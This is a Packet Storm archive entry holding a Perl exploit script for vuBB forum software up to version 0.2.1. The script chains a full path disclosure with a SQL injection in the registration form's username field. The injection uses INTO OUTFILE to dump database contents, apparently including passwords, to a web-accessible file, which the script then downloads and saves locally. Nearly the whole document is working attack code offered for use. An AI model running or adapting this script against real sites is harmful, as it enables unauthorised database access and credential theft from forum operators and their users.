vubb021b.txt

2006-06-26T00:00:00
ID PACKETSTORM:47686
Type packetstorm
Reporter DarkFig
Modified 2006-06-26T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# by DarkFig -- acid-root.new.fr  
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt  
#  
use IO::Socket;  
use LWP::Simple;  
  
  
# Header  
print "\r\n+---------------------------------------+", "\r\n";  
print "| vuBB <= 0.2.1 [BFA] SQL Injection -|", "\r\n";  
print "+---------------------------------------+", "\r\n";  
  
  
# Usage  
if(!$ARGV[2]){  
print "| Usage: <host> <path> <username> ------|", "\r\n";  
print "+---------------------------------------+", "\r\n";  
exit;  
}  
  
  
# Host  
if($ARGV[0] =~ /http:\/\/(.*)/){  
$host = $1;  
} else {  
$host = $ARGV[0];  
}  
print "[+]Host: $host\r\n";  
  
  
# Var  
my $path = $ARGV[1];  
my $user = $ARGV[2]; print "[+]User: $user\r\n";  
my $port = 80;  
my $fpd = "http://".$host.$path."includes/vubb.php";  
my $err1 = "[-]Can't connect to the host\r\n";  
my $err2 = "[-]Can't retrieve the full path\r\n";  
my $err3 = "[-]Can't retrieve the results\r\n";  
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";  
  
  
# Full Path Disclosure  
$req0 = get($fpd) or die print $err1 and end();  
if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {  
$fullpath = $1."/thisismypasswd.txt";  
print "[+]Path: $1\r\n";  
} else {  
print $err2 and end();  
}  
  
  
# Malicious data  
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";  
my $ldat = length $pdat;  
my $req1 = IO::Socket::INET->new(  
PeerAddr => $host,  
PeerPort => $port,  
Proto => "tcp"  
) or print $err1 and end();  
print $req1 "$poti", "\r\n";  
print $req1 "Host: $host", "\r\n";  
print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";  
print $req1 "Content-Length: $ldat", "\r\n\n";  
print $req1 "$pdat", "\r\n";  
close($req1);  
  
  
# Results  
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();  
open(f, ">VUBB_RESULT.txt");  
print f $req2;  
close(f);  
print "[+]Done: VUBB_RESULT.txt\r\n";  
end();  
  
  
# Bye  
sub end {  
print "+---------------------------------------+", "\r\n";  
exit;  
}  
`